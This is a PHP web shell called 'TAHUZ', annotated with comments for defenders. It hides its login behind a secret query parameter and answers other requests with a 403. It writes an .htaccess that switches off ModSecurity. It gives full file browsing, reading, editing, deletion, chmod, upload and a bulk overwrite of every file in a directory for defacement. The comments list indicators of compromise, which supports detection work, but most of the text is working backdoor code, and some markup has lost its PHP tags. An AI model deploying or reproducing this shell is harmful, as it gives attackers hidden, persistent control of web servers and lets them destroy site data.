// Access gate for the web shell. Nothing after the second check below runs
// unless the session already carries the 'loggedin' flag.
// Defender notes (static indicators visible in this block):
//   - a hard-coded 32-hex-character digest compared against md5() of a POST field
//   - a login prompt that is reachable only when the 'tahuz' query parameter is present
//   - a bare HTTP 403 for every other unauthenticated request, so a plain request
//     for the script URL shows an error page rather than a login form
session_start();

// Expected MD5 digest of the operator password. The trailing comment holds a
// second 32-hex value whose purpose is not shown in this listing.
$hashedPassword = "a326756b647320f76f766590e2dc3a34"; // e3bd470e3f07385023ac115081482bce

// Login path: taken only when 'tahuz' is in the query string and the session
// is not yet authenticated.
if (isset($_GET['tahuz']) && !isset($_SESSION['loggedin'])) {
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
// Unsalted MD5 of the submitted 'pass' field, compared with ===.
if (md5($_POST['pass']) === $hashedPassword) {
$_SESSION['loggedin'] = true;
// Redirect to the same path with the query string removed (strtok cuts at '?').
header("Location: " . strtok($_SERVER["REQUEST_URI"], '?'));
exit;
} else {
echo "<p style='color:red'>Ngetik Yang Bener Dek !</p>";
}
}
// Body of the login page. NOTE(review): only blank lines remain inside this
// literal; the form markup appears to have been lost in extraction.
echo '



';
exit;
}

// Every request without the session flag ends here with HTTP 403.
if (!isset($_SESSION['loggedin'])) {
http_response_code(403);
echo "Didnt have access!";
exit;
}

// Secret content starts here
echo "Selamat datang, Anda berhasil login.";
// Page title: get_current_user() reports the owner of the running script;
// '@' suppresses any PHP diagnostic from the call.
$title = @get_current_user();

<link href='http://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700' rel='stylesheet' type='text/css'>
<?php print $title ?> | <?php print @cwd() ?><title> print $title | print @cwd() </title>
<style type="text/css">
body {
font-family:Ubuntu Mono,serif;
color:#ddd;
} div.filemanager {
width:80%;
background:#1c1c1c;
border-radius:5px;
padding:7px;
box-shadow:0px 0px 10px black;
} select.filemanager {
font-family:Ubuntu Mono,serif;
width:100%;
padding:4.5px;
border-radius:3px;
background:#444;
border:1px solid #444;
color:#4C83AF;
} a {
color:#4C83AF;
text-decoration:none;
} a.file {
background:transparent;
width:100%;
height:400px;
color:#fff;
resize:none;
border:1px solid #444;
} textarea.filemanager {
width:100%;
border-radius:3px;
height:400px;
background:#444;
color:#ddd;
border:1px solid #444;
font-family:Ubuntu Mono,serif;
box-shadow:0px 0px 5px #444;
} input[type=submit].filemanager {
background:#444;
border-radius:3px;
font-family:Ubuntu Mono,serif;
color:#fff;
font-weight:bold;
border:1px solid #444;
padding:5px;
} th {
padding:3px;
} div.success {
background:green;
border-radius:3px;
text-align:center;
padding:5px;
} div.failed {
background:red;
border-radius:3px;
text-align:center;
padding:5px;
} tr.hover:hover {
background:#555;
} .icon {
width:23px;
height:23px;
} input[type=submit]:hover {
cursor:pointer;
} input[type=text].filemanager {
background:#444;
border-radius:3px;
font-family:Ubuntu Mono,serif;
border:1px solid #444;
padding:5px;
color:#fff;
} .action {
text-align:center;
font-weight:bold;
font-size:17px;
} span.filemanager {
padding:5px;
} td.filemanager {
padding:7px;
} input[type=file] {
background:#444;
border-radius:3px;
font-family:Ubuntu Mono,serif;
} input[type=submit].file {
border:3px solid #444;
border-radius:3px;
font-family:Ubuntu Mono,serif;
width:150px;
background:#444;
color:#fff;
font-weight:bold;
} td.filemanager {
padding:0px 5px;
width:600px;
} td.action {
width:50px;
} select.action {
color:#ddd;
} table.high {
background:#ddd;
border:1px solid #ddd;
padding:0px 5px;
} a.home {
font-size:30px;
} table, tr, td {
padding:5px;
border:1px solid #303030;
border-collapse:collapse;
border-spacing:0;
}
</style>

// Turns off PHP error reporting for the request; together with the '@'
// prefixes used throughout, failed file operations raise no PHP diagnostics.
error_reporting(0);
@define("SEP", @DIRECTORY_SEPARATOR);
// PATH is fixed from cwd(), which (as defined later in this listing) takes the
// directory from the 'path' query parameter when one is supplied.
@define("PATH", @cwd());
// PATH with the document-root prefix removed; used below to build links to files.
$FILEPATH = @str_replace($_SERVER['DOCUMENT_ROOT'], "", PATH);
/**
 * Renders a file as syntax-highlighted HTML, one table row per highlighted line.
 *
 * Acts only when the 'do' query parameter equals $post. The only checks on
 * $filename are file_exists() and is_file(); nothing confines it to a
 * directory, so any file readable by the PHP process can be displayed.
 *
 * @param string $post     Value of $_GET['do'] that selects this handler.
 * @param string $filename Path of the file to render.
 * @return void Ends the request with exit() after rendering; returns normally
 *              when 'do' does not match or the file cannot be opened.
 */
function view($post, $filename) {
if ($_GET['do'] == $post) {
if(file_exists($filename) && is_file($filename)) {
// Second argument true: highlight_file() returns the HTML instead of printing it.
$code = highlight_file($filename, true);
// Incremented once per line below but never printed in the visible code.
$counter = 1;
// NOTE(review): assumes the highlighter separates lines with '<br />' - confirm
// for the PHP version in use.
$arr = explode('<br />', $code);
echo '<table class="high" border="0" width="100%" style="font-family: monospace;">' . "\r\n";
foreach($arr as $line) {
echo '<tr style="border:none">' . "\r\n";

// $comments tracks whether the current line sits inside a multi-line block
// comment, so continuation lines keep the comment colour.
// NOTE(review): $comments is read in the final else branch before anything in
// this function has assigned it, when the first line carries no comment opener.
if((strstr($line, '<span style="color: #FF8000">/*') !== false) && (strstr($line, '*/') !== false)) {
$comments = false;
$startcolor = "orange";
} elseif(strstr($line, '<span style="color: #FF8000">/*') !== false) {
$startcolor = "orange";
$comments = true;
} else {
$startcolor = "green";
if($comments) {
if(strstr($line, '*/') !== false) {
$comments = false;
$startcolor = "orange";
} else {
$comments = true;
}
} else {
$comments = false;
$startcolor = "green";
}
} if($comments)
echo '<td width="100%" nowrap style="color: orange;border:none">' . $line . '' . "\r\n";
else
echo '<td width="100%" nowrap style="color: ' . $startcolor . ';border:none">' . $line . '' . "\r\n";
echo '' . "\r\n";
$counter++;
}
echo '' . "\r\n";
} else {
// $filename is interpolated into the HTML response without escaping.
echo "<p>The file <i>$filename</i> could not be opened.</p>\r\n";
return;
} exit();
}
}
// Runs the viewer with the raw 'file' query parameter; '@' suppresses PHP
// diagnostics raised during the call.
@view("view", $_GET['file']);


<div class="filemanager">
<table class="filemanager" width="100%">

// Defence evasion: each time execution reaches this point the script writes an
// ".htaccess" file whose directives switch the ModSecurity engine off.
// The path is relative, so it resolves against the process's current directory,
// and fopen mode "w" truncates: any existing .htaccess there is replaced.
// Defender notes: an .htaccess holding "SecRuleEngine Off" / "SecFilterEngine Off"
// that the site owner did not write is a strong indicator of this script having run.
// Whether the web server honours the directives depends on its configuration,
// which cannot be determined from this file.
$text = "<IfModule mod_security.c>
SecRuleEngine Off
SecFilterInheritance Off
SecFilterEngine Off
</IfModule>";
$file = @fopen(".htaccess", "w");
@fwrite($file, $text);
@fclose($file);
/**
 * Resolves the directory the file manager operates on.
 *
 * When the 'path' query parameter is present it is used as supplied (backslashes
 * turned into forward slashes) and the process changes into it; otherwise the
 * current working directory is used. No check confines the path to the web root.
 *
 * @return string Directory path with forward slashes. The chdir() result is not
 *                checked, so the returned value may name a directory the process
 *                did not actually enter.
 */
function cwd() {
if (isset($_GET['path'])) {
$cwd = @str_replace('\\', '/', $_GET['path']);
@chdir($cwd);
} else {
$cwd = @str_replace('\\', '/', @getcwd());
} return $cwd;
} function pwd() {
// pwd(): prints the current path as a breadcrumb, one link per path segment.
// Each link's ?path= value is the prefix up to and including that segment.
// Segments come from cwd() and are printed without HTML escaping.
$dir = @explode("/", @cwd());
foreach ($dir as $key => $pwd) {
print("<a href='?path=");
// Rebuild the prefix 0..$key, joined by '/'.
for ($i=0; $i <= $key ; $i++) {
print($dir[$i]);
if ($i != $key) {
print("/");
}
} print("'>".$pwd."</a>/");
}
} function perms($filename) {
// perms(): builds an ls-style mode string from fileperms(): one file-type
// character followed by nine permission characters (owner, group, other).
// Note that a regular file is marked 'r' here, not '-'.
$perms = fileperms($filename);
// The top four bits of the mode select the file type.
switch ($perms & 0xF000) {
case 0xC000: // socket
$info = 's';
break;
case 0xA000: // symbolic link
$info = 'l';
break;
case 0x8000: // regular
$info = 'r';
break;
case 0x6000: // block special
$info = 'b';
break;
case 0x4000: // directory
$info = 'd';
break;
case 0x2000: // character special
$info = 'c';
break;
case 0x1000: // FIFO pipe
$info = 'p';
break;
default: // unknown
$info = 'u';
// Owner: read, write, then execute combined with the 0x0800 (setuid) bit.
} $info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group: read, write, then execute combined with the 0x0400 (setgid) bit.
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// Other: read, write, then execute combined with the 0x0200 (sticky) bit.
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
} function permission($filename, $perms) {
// permission(): prints $perms in red when $filename is not writable by the PHP
// process and in green when it is, which shows the operator at a glance which
// entries can be modified.
// NOTE(review): the markup lines below are not valid PHP as shown; the PHP
// open/close tags around them appear to have been stripped in extraction.
if (!is_writable($filename)) {
<font color="red"> print $perms </font>
} else {
<font color="green"> print $perms </font>
}
} function action($typePost, $typeFile, $filename, $value) {
// action(): returns an <option> element whose value is a relative URL of the form
// ?path=PATH&do=$typePost&$typeFile=$filename, labelled $value.
// The parts are concatenated without URL or HTML encoding.
$action = "<option value='?path=".PATH."&do=".$typePost."&".$typeFile."=".$filename."'>".$value."</option>";
return $action;
} function tools($toolsname, $value) {
// tools(): returns an <option> element whose value is ?path=PATH&$toolsname,
// labelled $value; used for the "Make File" / "Make Dir" menu entries.
$tools = "<option value='?path=".PATH."&".$toolsname."'>".$value."</option>";
return $tools;
} function redirect($path, $cwd) {
// redirect(): emits a script element that sets window.location to a query string
// built from $path and $cwd, i.e. a client-side redirect.
// NOTE(review): the markup below lost its PHP open/close tags in extraction.

<script type="text/javascript">
window.location='? print $path = print $cwd ';
</script>

} function success($text) {
// success(): prints $text inside a div with class "success"; $text is not escaped.

<div class="success"> print $text </div>

} function failed($text) {
// failed(): prints $text inside a div with class "failed"; $text is not escaped.

<div class="failed"> print $text </div>

} function back($dir, $value) {
// back(): returns an <option> element pointing at ?path=$dir, labelled $value.
$back = "<option value='?path=".$dir."'>".$value."</option>";
return $back;
} function getPath() {
// getPath(): returns the scandir() listing of PATH; '@' hides the warning on
// failure, in which case scandir() yields false rather than an array.
$getPath = @scandir(PATH);
return $getPath;
} function size($filename) {
// size(): returns the file size as a display string. The size in KB is rounded to
// three decimals; values above 1024 KB are shown in MB with two decimals.
$size = @filesize($filename)/1024;
$size = @round($size, 3);
if ($size > 1024) {
$size = @round($size/1024,2). 'MB';
} else {
$size = $size. 'KB';
} return $size;
} function backup($post, $filename) {
// backup(): when the 'do' query parameter equals $post, writes a copy of
// $filename's contents to "$filename.bak" (mode "w" truncates an existing copy).
// No result is checked and nothing is reported to the caller.
if ($_GET['do'] == $post) {
$file = @file_get_contents($filename);
$fp = @fopen($filename.".bak", "w");
@fwrite($fp, $file);
@fclose($fp);
}
} function deleteAllFiles($dir, $text, $filename) {
// deleteAllFiles(): despite the name, nothing is unlinked. Every entry of $dir
// except '.', '..', this script and $filename is opened with mode "w" and has
// $text written into it, i.e. the directory's files are overwritten in bulk.
// Defender note: many files in one directory sharing identical content and
// near-identical modification times is the footprint this leaves.
$getFile = @scandir($dir);
foreach ($getFile as $file) {
if ($file != "." && $file != ".." ) {
// Entries spared from the overwrite: this script's own file name and $filename.
$noDelete = @array(@basename(__FILE__), $filename);
if (in_array($file, $noDelete)) {
continue;
}
$fp = @fopen($dir.DIRECTORY_SEPARATOR.$file, "w");
// The handle is never closed in the visible code.
if (@fwrite($fp, $text)) {



print $dir.DIRECTORY_SEPARATOR.$file
<span class="ok">OK</span>



}
}
}
}
// Bulk-overwrite trigger: directory, replacement text and the spared file name
// all come straight from the POST body.
// NOTE(review): every POST carrying 'submit' reaches this call, including the
// forms of the other handlers in this listing, which also test $_POST['submit'].
if (isset($_POST['submit'])) {
@deleteAllFiles($_POST['dir'], $_POST['text'], $_POST['filename']);
}


/**
 * File-creation handler: active when the query string contains the key $post.
 *
 * On a POST carrying 'submit' it opens the path given in $_POST['filename'] with
 * mode "w" and writes $_POST['text'] into it. Neither the path nor the content is
 * validated, so this is an arbitrary file write with the PHP process's rights.
 * Ends the request with exit() after printing its form.
 * NOTE(review): the interleaved markup lost its PHP open/close tags in extraction.
 *
 * @param string $post Name of the query-string key that selects this handler.
 * @return void
 */
function makefile($post) {
if (isset($_GET[$post])) {
$filename = $_POST['filename'];


<th>
<a onclick="window.location='?path= print PATH '">MAKE FILE</a>
</th>


if (isset($_POST['submit'])) {
$fp = @fopen($filename, "w");
// fwrite() returns the byte count, so empty content is reported as a failure.
if (@fwrite($fp, $_POST['text'])) {


print @success("Create file ".$filename." Successfully")


} else {


print @failed("Create file ".$filename." Failed")


}
}


<tr class="filemanager">




<tr class="filemanager">

<textarea class="filemanager" name="text">TAHUZ SHELL</textarea>


<tr class="filemanager">






exit();
}
} function makedir($post) {
// makedir(): active when the query string contains the key $post. On a POST
// carrying 'submit' it calls mkdir() on the unvalidated $_POST['dirname'] and
// prints a success or failure banner, then ends the request with exit().
if (isset($_GET[$post])) {
if (isset($_POST['submit'])) {
$dirname = $_POST['dirname'];
if (@mkdir($dirname)) {
@success("Create dir ".$dirname." Successfully");
} else {
@failed("Create dir ".$dirname." Failed");
}
}



<th>
<a onclick="window.location='?path= print PATH '">MAKE DIR</a>
</th>

<tr class="filemanager">











exit();
}
} function changeMode($post, $filename) {
// changeMode(): active when the 'do' query parameter equals $post. On a POST
// carrying 'submit' it calls chmod() on $filename with $_POST['mode'] exactly as
// submitted, prints a banner, then ends the request with exit().
if ($_GET['do'] == $post) {


<th><a onclick="window.location='?path= print PATH '">CHANGE MODE</a></th>


if (isset($_POST['submit'])) {
if (@chmod($filename, $_POST['mode'])) {


print @success("Change file ".@substr(sprintf('%o', @fileperms($filename)), -4)." to ".$_POST['mode']." Successfully")


} else {


print @failed("Change file Failed")


}
}


<tr class="filemanager">




<tr class="filemanager">






exit();
}
} function copyFile($post, $filename) {
// copyFile(): active when the 'do' query parameter equals $post. On a POST
// carrying 'submit' it copies $filename to the unvalidated destination in
// $_POST['to'], prints a banner and an action menu, then ends the request.
if ($_GET['do'] == $post) {
if (isset($_POST['submit'])) {
if (@copy($filename, $_POST['to'])) {
@success("File ".$filename." Copied to ".$_POST['to']."");
} else {
@failed("File ".$filename." Copied Failed");
}
}



<th colspan="2">
Copy File
</th>

<tr class="filemanager">



<td style="width:100px;">
<select class="filemanager" onclick="if (this.value) window.location=(this.value)">
<option value="" selected>Choose . .</option>
print @action("edit", "file", $filename, "Edit")
print @action("rename", "file", $filename, "Rename")
print @action("delete", "file", $filename, "Delete")
print @back(PATH, "BACK")
</select>


<tr class="filemanager">
<td colspan="2">



<tr class="filemanager">
<td colspan="2">





exit();
}
} function delete($filename) {
// delete(): removes a file, or a directory together with everything beneath it.
// For a directory it walks scandir(), recursing into subdirectories and
// unlinking files, then removes the directory itself. Returns the boolean result
// of the final rmdir()/unlink(); results of the inner calls are ignored.
// $filename is not validated or confined to any base directory.
if (@is_dir($filename)) {
$scandir = @scandir($filename);
foreach ($scandir as $object) {
if ($object != '.' && $object != '..') {
if (@is_dir($filename.SEP.$object)) {
@delete($filename.SEP.$object);
} else {
@unlink($filename.SEP.$object);
}
}
} if (@rmdir($filename)) {
return true;
} else {
return false;
}
} else {
if (@unlink($filename)) {
return true;
} else {
return false;
}
}
} function edit($post, $filename) {
// edit(): file editor, active when the 'do' query parameter equals $post.
// On a POST carrying 'submit' it opens $filename with mode 'w' (truncating it) and
// writes $_POST['text'] over it; the file is then re-read and shown in a textarea.
// $filename is unvalidated, so any file writable by the PHP process can be
// replaced. Ends the request with exit().
// NOTE(review): the interleaved markup lost its PHP open/close tags in extraction.
if ($_GET['do'] == $post) {


<th colspan="2">FILE EDITOR</th>


if (isset($_POST['submit'])) {
$fp = @fopen($filename, 'w');
if (@fwrite($fp, $_POST['text'])) {
<td colspan="2"> @success("Success");
} else {
<td colspan="2"> @failed("Failed");
}
// File contents are HTML-escaped before being placed in the textarea.
} $text = @htmlspecialchars(@file_get_contents($filename));


<tr class="filemanager">
<td class="filemanager">
<span class="filemanager"> [ Filename :
print @permission($filename, $filename) ]
[ Size : print @permission($filename, @size($filename)) ]
</span>

<td style="width:50px;">
<select class="filemanager" onclick="if (this.value) window.location=(this.value)">
<option value="" selected>Choose . .</option>
print @action("view", "file", $filename, "Highlight")
print @action("rename", "file", $filename, "Rename")
print @action("delete", "file", $filename, "Delete")
print @action("copy", "file", $filename, "Copy")
print @back(PATH, "BACK")
</select>


<tr class="filemanager">
<td colspan="2">
<textarea class="filemanager" name="text" placeholder="Nothing Script"> print $text </textarea>


<tr class="filemanager">
<td colspan="2">





exit();
}
} function renames($post, $filename) {
// renames(): active when the 'do' query parameter equals $post. On a POST
// carrying 'submit' it renames $filename to the unvalidated $_POST['newname'];
// on success the browser is sent back to the PATH listing, otherwise a failure
// banner is printed. Ends the request with exit().
if ($_GET['do'] == $post) {


<th colspan="2">RENAME</th>


if (isset($_POST['submit'])) {
$renames = @rename($filename, $_POST['newname']);
if ($renames) {
@redirect("path", PATH);
} else {
<td colspan="2"> @failed("Failed");
}
}


<tr class="filemanager">




<select class="filemanager" onclick="if (this.value) window.location=(this.value)">
<option selected></option>
print @action("edit", "file", $filename, "Edit")
print @action("delete", "file", $filename, "Delete")
print @back(PATH, "BACK")
</select>


<tr class="filename">
<td colspan="2">





exit();
}
}

// Action
// Request dispatch. Each handler checks the 'do' value (or query key) itself and
// receives the raw 'file' query parameter with no validation.
// Deletion is triggered by the query string alone (do=delete plus file=); no POST
// and no confirmation step is involved.
// Defender note: access-log entries for one script whose query strings combine
// path= with do=edit|delete|rename|backup|copy|chmod|view and file=, or with
// makefile / makedir, match the URL scheme this listing generates.
@edit("edit", $_GET['file']);
if ($_GET['do'] == 'delete') {
@delete($_GET['file']);
}
@renames("rename", $_GET['file']);
@backup("backup", $_GET['file']);
@copyFile("copy", $_GET['file']);
@changeMode("chmod", $_GET['file']);
@makefile("makefile");
@makedir("makedir");



<th colspan="4">
<a class="home" href=" print $_SERVER['SCRIPT_NAME'] ">TAHUZ</a>
</th>


<td colspan="4">

System : print @Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64




<td colspan="4">

// Upload handler: copies the uploaded temporary file to a relative path equal to
// the file name supplied by the client, so it lands in the current directory.
// No check on extension, content type or size is made, and copy() is used
// directly on the temporary path. On success a link to the stored file is printed.
// Defender note: script files newly created in web-served directories by the web
// server's own account are the artefact this leaves behind.
if (isset($_POST['submit'])) {
if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
@success("Upload at =>
<a href='".$GLOBALS['FILEPATH']."/".$_FILES['file']['name']."' target='_blank'>
".$_FILES['file']['name']."</a>");
} else {
@failed("Upload Failed");
}
}









<tr class="filemanager">
<th colspan="4"> print @pwd() </th>

<tr class="filemanager">
<th>Filename</th>
<th>Permission</th>
<th>Size</th>
<th style="width:90px;">
<select class="filemanager action" onclick="if (this.value)window.location=(this.value)">
<option value="" selected>Action</option>
print @tools("makefile", "Make File")
print @tools("makedir", "Make Dir")
</select>
</th>


// Directory rows of the listing. Stops with an error cell when PATH is not a
// directory or is not readable, then prints one row per subdirectory with its
// permission string and a Delete / Rename menu.
// The row markup loads its icon from an external host (nzsc.xtgem.com), which is
// a usable static string when hunting for copies of this script.
// NOTE(review): the interleaved markup lost its PHP open/close tags in extraction.
if(!is_dir(PATH)) die("<td colspan='4'>
<font color='red'>Directory '".PATH."' is not exists.</font></>");
if(!is_readable(PATH)) die("<td colspan='4'>
<font color='red'>Directory '".PATH."' not readable.</font></>");
foreach (@getPath() as $dir) {
// Entry names are tested relative to the process's current directory.
if (!is_dir($dir)) continue;
if ($dir === '.' || $dir === '..') continue;

<tr class="filemanager hover">
<td class="filemanager">
<img src='http://nzsc.xtgem.com/folder.png' width=15px>
<a href="?path= print PATH.SEP.$dir "> print $dir </a>

print @permission($dir, @perms($dir))

--

<td class="action">
<select class="path" onclick="if (this.value) window.location=(this.value)">
<option value="" selected>Choose . .</option>
print @action("delete", "file", $dir, "Delete")
print @action("rename", "file", $dir, "Rename")
</select>



}
// File rows of the listing: one row per regular file with a direct link built
// from $FILEPATH, a permission string that links to the chmod handler, the size,
// and an Edit / Delete / Rename / Backup / Copy menu.
// NOTE(review): the interleaved markup lost its PHP open/close tags in extraction.
foreach (@getPath() as $file) {
// Entry names are tested relative to the process's current directory.
if (!is_file($file)) continue;

<tr class="filemanager hover">
<td class="filemanager">
<img src='http://nzsc.xtgem.com/file2.png' width=15px>
<a href=" print $GLOBALS['FILEPATH'] / print $file " target='_blank'> print $file </a>


<a href="?path= print PATH &do=chmod&file= print $file "> print @permission($file, @perms($file)) </a>

print @size($file)

<td style="width:50px;">
<select class="path" onclick="if (this.value) window.location=(this.value)">
<option value="" selected>Choose . .</option>
print @action("edit", "file", $file, "Edit")
print @action("delete", "file", $file, "Delete")
print @action("rename", "file", $file, "Rename")
print @action("backup", "file", $file, "Backup")
print @action("copy", "file", $file, "Copy")
</select>




}


<th colspan="4">
&copy; print @date("Y") - TAHUZ |

// Footer counter: number of entries in the current directory minus two (for '.'
// and '..'). The label says "Files" but subdirectories are counted as well.
$file = @scandir(@cwd());
$count = @count($file)-2;
// NOTE(review): $file holds the scandir() result here, not a path, when it is
// passed to is_file().
if (!is_file($file)) {
print("Files : ".$count."");
}

</th>


</div>